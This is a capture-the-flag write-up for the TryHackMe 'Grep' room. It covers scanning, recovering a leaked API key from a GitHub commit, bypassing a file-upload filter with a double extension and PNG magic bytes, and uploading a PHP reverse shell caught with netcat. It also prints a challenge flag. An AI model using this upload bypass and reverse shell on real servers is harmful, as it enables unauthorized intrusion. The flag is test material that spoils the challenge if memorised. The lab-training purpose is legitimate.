Skip to content

Latest commit

 

History

History
180 lines (100 loc) · 4.97 KB

greprtp.md

File metadata and controls

180 lines (100 loc) · 4.97 KB

Grep

A challenge that tests your reconnaissance and OSINT skills.

Scanning

scan the target

nmap -sS -sV -T4 -p- 10.10.47.192

image

3 open web servers (80,443,51337)

HTTP

let's check the webapp, it seem nothing on port 80

image

and port 443 got error

image

refer to previous nmap report, i need to add domain grep.thm to hosts file

echo "10.10.47.192  grep.thm" >> /etc/hosts

okay, here you are

image

Enumeration

as the hint, the website is developed by SuperSecure Corp, and it's under developed

after a bit research i find it on Github with "SearchME" AND "This website is under development"

image

exactly what we need, only 4 commits and it's also a new project

image

i found some endpoints here

image

i tried to register an account but it need an API key

image

i can easily get key via a commit "remove key"

image

open burpsuite, catch request, change X-THM-API-Key to our key

image

after login, we got the first flag

image

Flag First flag
Answer THM{4ec9806d7e1350270dc402ba870ccebb}

Exploitation

another endpoint is upload.php allowed us upload images to /uploads

image

cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php

image

remember, webserver filter file by 2 things: extensions and magic bytes

image

so, we need to change both extension and some magic bytes

mv php-reverse-shell.php reverse.png.php
vi reverse.png.php

padding some characters at the beginning of file

image

change the padding hex to png magic bytes

hexedit reverse.png.php
89 50 4e 47
Ctrl+X
xxd reverse.png.php | head

image

file uploaded successfully

image

nc -vlnp 1234

go to https://grep.thm/api/uploads/ and click to our file

image

we got our shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

image

i checked nothing at home folders, but in our /var/www, i see 2 interesting folder

image

we only have permission on user.sql maybe contain admin's email

image

cd backup
grep admin user.sql

image

backto leakchecker and a lot of certificate in web folder, i think it related to a domain

echo "10.10.47.192  leakchecker.grep.thm" >> /etc/hosts

here, you can find it in port 51337 from previous nmap scan

image

just enter admin's email to get password

image

.

Flag user.txt
Answer